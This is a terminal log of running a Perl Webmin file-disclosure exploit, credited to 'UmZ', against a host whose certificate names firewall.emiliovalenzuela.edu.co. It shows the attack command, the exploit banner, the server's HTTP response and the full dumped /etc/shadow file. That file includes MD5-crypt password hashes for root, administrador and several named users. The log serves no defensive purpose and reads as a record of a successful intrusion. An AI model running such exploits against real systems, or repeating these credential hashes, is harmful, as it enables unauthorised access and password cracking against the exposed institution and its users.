root@bt:~# ./web.pl 192.168.1.33 20000 /etc/shadow 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.1.33 on port 20000!
FILENAME:  /etc/shadow
FILE CONTENT STARTED
-------------------------------------------
HTTP/1.0 200 Document follows
Connection: close
Date: Tue, 18 May 2010 04:00:18 GMT
Server: MiniServ/0.01
Content-Length: 971
Content-Type: text/plain
Last-Modified: Fri, 17 Jul 2009 03:12:26 GMT
Client-Date: Tue, 18 May 2010 04:00:36 GMT
Client-Peer: 192.168.1.33:20000
Client-Response-Num: 1
Client-SSL-Cert-Issuer: /O=Usermin Webserver on firewall.emiliovalenzuela.edu.co/CN=*/emailAddress=root@firewall.emiliovalenzuela.edu.co
Client-SSL-Cert-Subject: /O=Usermin Webserver on firewall.emiliovalenzuela.edu.co/CN=*/emailAddress=root@firewall.emiliovalenzuela.edu.co
Client-SSL-Cipher: AES256-SHA
Client-SSL-Warning: Peer certificate not verified

root:$1$R7TgbQtV$wlPh2IwVM52TGU9lMQ/7C/:14442:0:99999:7:::
bin:*:14372:0:99999:7:::
daemon:*:14372:0:99999:7:::
adm:*:14372:0:99999:7:::
lp:*:14372:0:99999:7:::
sync:*:14372:0:99999:7:::
shutdown:*:14372:0:99999:7:::
halt:*:14372:0:99999:7:::
mail:*:14372:0:99999:7:::
news:*:14372:0:99999:7:::
uucp:*:14372:0:99999:7:::
operator:*:14372:0:99999:7:::
games:*:14372:0:99999:7:::
nobody:*:14372:0:99999:7:::
rpm:!!:14372:0:99999:7:::
messagebus:!!:14372::::::
vcsa:!!:14372::::::
avahi:!!:14372::::::
haldaemon:!!:14372::::::
rpc:!!:14372::::::
rpcuser:!!:14372::::::
sshd:!!:14372::::::
www:!!:14372::::::
lugarcia:$1$rCzNmQ8b$2K/DTpT12sDURaZ0IgFlt.:14373:0:99999:7:::
squid:!!:14373::::::
copias:!!:14374:0:99999:7:::
joomla:$1$E8mdoe/5$TGvaT5MJjVFynEB9RrRgH0:14382:0:99999:7:::
mriveros:$1$YMn9Kh2B$Mk0hRT0FVJQ3B4x9yhoW70:14377:0:99999:7:::
moodle:$1$5P0ZLdJi$HsKlIxR1lxA7Ny1DR4IpD1:14383:0:99999:7:::
administrador:$1$3ZnDYDLn$JKXWBAmKx/tOggQoPQ2g7.:14404:0:99999:7:::
-------------------------------------------